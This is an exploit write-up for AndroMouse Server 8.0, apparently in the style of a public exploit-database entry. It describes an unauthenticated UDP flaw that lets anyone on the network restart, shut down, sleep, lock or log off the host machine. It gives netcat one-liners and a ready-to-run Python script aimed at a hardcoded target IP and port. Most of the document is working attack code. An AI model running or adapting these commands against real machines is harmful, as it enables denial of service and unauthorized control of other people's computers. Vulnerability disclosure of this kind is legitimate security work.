# Exploit Title: AndroMouse Server 8.0 – Unauthenticated Remote System
Control (Restart, Shutdown, Sleep, Lock)
# Date: 04/07/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: http://andromouse.com
# Software Link: https://andromouse-server.en.lo4d.com/windows
# Version: 8.0
# Tested on: Windows 10

'''
Description:

Unauthenticated Remote System Control in AndroMouse Server 8.0 allows
attackers to send UDP commands to remotely restart, shutdown, sleep, lock,
or log off the target machine without authentication. This leads to
unauthorized power state manipulation and potential denial of service.

POC:

echo -n "power_key_restart" | nc -u 192.168.8.104 8888
echo -n "power_key_shutdown" | nc -u 192.168.8.104 8888
echo -n "power_key_sleep" | nc -u 192.168.8.104 8888
echo -n "power_key_lock" | nc -u 192.168.8.104 8888
echo -n "power_key_logoff" | nc -u 192.168.8.104 8888

'''


import socket
import time
import sys

TARGET_IP = "192.168.8.104"
TARGET_PORT = 8888
NEWLINE = b"\x0a"
RETRY_DELAY = 3

POWER_COMMANDS = {
    "sleep": "power_key_sleep",
    "shutdown": "power_key_shutdown",
    "restart": "power_key_restart",
    "lock": "power_key_lock",
    "logoff": "power_key_logoff"
}

def send_power_command(command):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(5)

    try:
        sock.sendto(POWER_COMMANDS[command].encode() + NEWLINE, (TARGET_IP,
TARGET_PORT))
        return True
    except Exception:
        return False
    finally:
        sock.close()

if __name__ == "__main__":
    if len(sys.argv) != 2 or sys.argv[1].lower() not in POWER_COMMANDS:
        print(f"Usage: {sys.argv[0]} <{'|'.join(POWER_COMMANDS.keys())}>")
        sys.exit(1)

    if send_power_command(sys.argv[1].lower()):
        print(f"Sent {sys.argv[1]} command")
    else:
        print("Failed to send command")